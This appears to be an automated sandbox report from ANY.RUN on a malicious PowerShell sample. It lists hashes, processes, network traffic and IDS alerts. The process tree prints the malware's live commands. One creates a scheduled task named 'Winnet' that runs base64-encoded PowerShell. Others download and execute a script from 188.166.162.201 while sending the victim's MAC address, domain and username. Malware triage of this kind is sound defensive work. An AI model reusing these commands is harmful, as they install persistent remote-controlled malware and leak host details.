Field | Value |
---|---|
download: | p |
Full analysis: | https://app.any.run/tasks/776b97c3-69d0-423f-8619-bed500b441b2 |
Verdict: | Malicious activity |
Analysis date: | October 20, 2020, 09:56:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | 47DEE8020B2CF7336173C54AB6A71033 |
SHA1: | 8C2572F97C3BB2D3D8CB2156596318AD12290831 |
SHA256: | 9558FA57CE3C589061403A2F847136ECD03E9C785C57F25188ED1FA1D256F887 |
SSDEEP: | 48:1ffilIypT0yuuQRivHi/WDV2b9rKN5Wrhe:slxpvpHiODV2b9YArhe |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2064 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\p | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2512 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\p | C:\Windows\system32\NOTEPAD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3536 | "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 4294967295 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3224 | "C:\Windows\system32\getmac.exe" /FO CSV | C:\Windows\system32\getmac.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Displays NIC MAC information Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3340 | "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQALwBwAD8AaABpAGcAMgAwADEAMAAyADAAJwApAA==" /F | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1656 | "C:\Windows\system32\schtasks.exe" /run /tn Winnet | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
540 | "C:\Windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True')" | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2496 | powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True')" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4072 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ux6-qudl.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3112 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES996.tmp" "c:\Users\admin\AppData\Local\Temp\CSC995.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
3536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64XS4DZO84M13YEYE0TN.temp | — | |
MD5:— | SHA256:— | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2T2UP1YI02OIOA9JQ34B.temp | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC995.tmp | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.pdb | — | |
MD5:— | SHA256:— | |||
3112 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES996.tmp | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.dll | — | |
MD5:— | SHA256:— | |||
4072 | csc.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.out | — | |
MD5:— | SHA256:— | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2df8cc.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2496 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ux6-qudl.cmdline | text | |
MD5:5C1F261FB7296EBE84B9B10BE57D3379 | SHA256:0D21623E5B64B29B6A22528ECEE9B44F32458B879C68DB3473FD859103BF42D3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2496 | powershell.exe | GET | 200 | 188.166.162.201:80 | http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True | DE | text | 2.31 Mb | malicious |
2496 | powershell.exe | GET | 200 | 188.166.162.201:80 | http://p.estonine.com/getnew.php?ver=2020&mac=12-A9-86-6C-77-DE&re=0&pid=2496&av=&ver=6.1.7601&bit=32-bit | DE | text | 2 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2496 | powershell.exe | 188.166.162.6:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.4:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.9:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.2:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.7:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.1:445 | — | Digital Ocean, Inc. | DE | suspicious |
2496 | powershell.exe | 23.21.126.66:443 | api.ipify.org | Amazon.com, Inc. | US | suspicious |
2496 | powershell.exe | 188.166.162.3:445 | — | Digital Ocean, Inc. | DE | unknown |
2496 | powershell.exe | 188.166.162.201:80 | p.estonine.com | Digital Ocean, Inc. | DE | malicious |
2496 | powershell.exe | 188.166.162.5:445 | — | Digital Ocean, Inc. | DE | unknown |
Domain | IP | Reputation |
---|---|---|
p.estonine.com | | malicious |
api.ipify.org | | shared |
PID | Process | Class | Message |
---|---|---|---|
2496 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.Siggen.22 |
2496 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.MemoryStream.Stager |
2496 | powershell.exe | Misc activity | AV MALWARE Suspicious Powershell Script embedded in Inbound Image 3 |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
2496 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] ipify.org External IP Check |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |